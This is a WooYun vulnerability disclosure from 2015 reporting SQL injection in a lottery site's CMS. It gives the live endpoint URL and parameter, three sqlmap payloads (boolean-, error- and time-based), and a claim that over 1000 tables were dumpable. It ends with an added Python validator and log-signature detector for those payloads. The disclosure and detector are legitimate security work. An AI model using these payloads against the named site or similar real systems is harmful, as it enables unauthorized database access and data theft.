WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-07-21: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-09-04: The vendor has chosen to ignore the vulnerability; details disclosed to the public.
A site belonging to 第一彩采彡PIAO has a SQL injection vulnerability (the database can be dumped)
The 第一彩采彡PIAO CMS has a SQL injection vulnerability through which the database can be dumped, exposing the contents of more than 1000 tables: http://cms.diyicai.com/
First, the injection point: http://cms.diyicai.com/php/play_num.php?callback=jsonp1437375317596&&type=update&random=0.000027690278299852267&id=1414428 . The injectable parameter is: id
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: callback=jsonp1437375317596&&type=update&random=0.000027690278299852267&id=1414428 AND 1204=1204

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: callback=jsonp1437375317596&&type=update&random=0.000027690278299852267&id=1414428 AND (SELECT 3690 FROM(SELECT COUNT(*),CONCAT(0x716a627871,(SELECT (ELT(3690=3690,1))),0x716a766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: callback=jsonp1437375317596&&type=update&random=0.000027690278299852267&id=1414428 AND (SELECT * FROM (SELECT(SLEEP(5)))txRf)
The databases can be enumerated through the injection.
The current database is tidemedia_cms_2, which contains more than 1000 tables.
Dumping the tables exposes a great deal of sensitive information; two tables were dumped at random as a sample:
Fix: apply proper input filtering.
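The fix advice above stops at "filtering". As an added example (not code from the report or from the affected site), the check below does what that means for this endpoint: `id` is a record number, so only digits are accepted, and anything else is classified against the three payload shapes quoted in the sqlmap output so a defender can spot the same probing in web logs. The access-log lines are constructed for illustration and assume a common log format.

```python
"""Added example: strict validation of the numeric `id` parameter of play_num.php
and a classifier that flags the boolean-, error- and time-based payload shapes
quoted in the report. Log lines below are constructed, not taken from any server."""
import re
from urllib.parse import urlsplit, parse_qs

# Signatures derived from the three payloads quoted in the report's sqlmap output.
SIGNATURES = {
    "boolean-based": re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)|INFORMATION_SCHEMA", re.I),
    "time-based": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
}

def is_valid_id(value):
    """The filtering the report asks for: `id` is a record number, so accept digits only."""
    return value.isdigit() and len(value) <= 12

def classify_request(url):
    """Return the technique names whose signature appears in the `id` query parameter.
    A well-formed `id` yields an empty list; parse_qs already percent-decodes the value."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    raw_id = qs.get("id", [""])[0]
    if is_valid_id(raw_id):
        return []
    return [name for name, pattern in SIGNATURES.items() if pattern.search(raw_id)]

# Constructed common-log-format lines: one clean request, then two probes in the
# shape of the boolean-based and time-based payloads quoted in the report.
LOG_LINES = [
    '203.0.113.5 - - [21/Jul/2015:10:01:02 +0800] "GET /php/play_num.php?callback=jsonp1&&type=update&id=1414428 HTTP/1.1" 200 77',
    '203.0.113.5 - - [21/Jul/2015:10:01:03 +0800] "GET /php/play_num.php?callback=jsonp1&&type=update&id=1414428%20AND%201204%3D1204 HTTP/1.1" 200 77',
    '203.0.113.5 - - [21/Jul/2015:10:01:04 +0800] "GET /php/play_num.php?callback=jsonp1&&type=update&id=1414428%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))txRf) HTTP/1.1" 200 77',
]

LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def scan_log(lines):
    """Map line index -> detected techniques; lines whose `id` passes validation are omitted."""
    hits = {}
    for i, line in enumerate(lines):
        m = LOG_RE.search(line)
        if m:
            found = classify_request(m.group(1))
            if found:
                hits[i] = found
    return hits

if __name__ == "__main__":
    for idx, techniques in scan_log(LOG_LINES).items():
        print(f"line {idx}: {', '.join(techniques)}")
```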
Vendor response: the vendor could not be reached, or the vendor actively declined the report.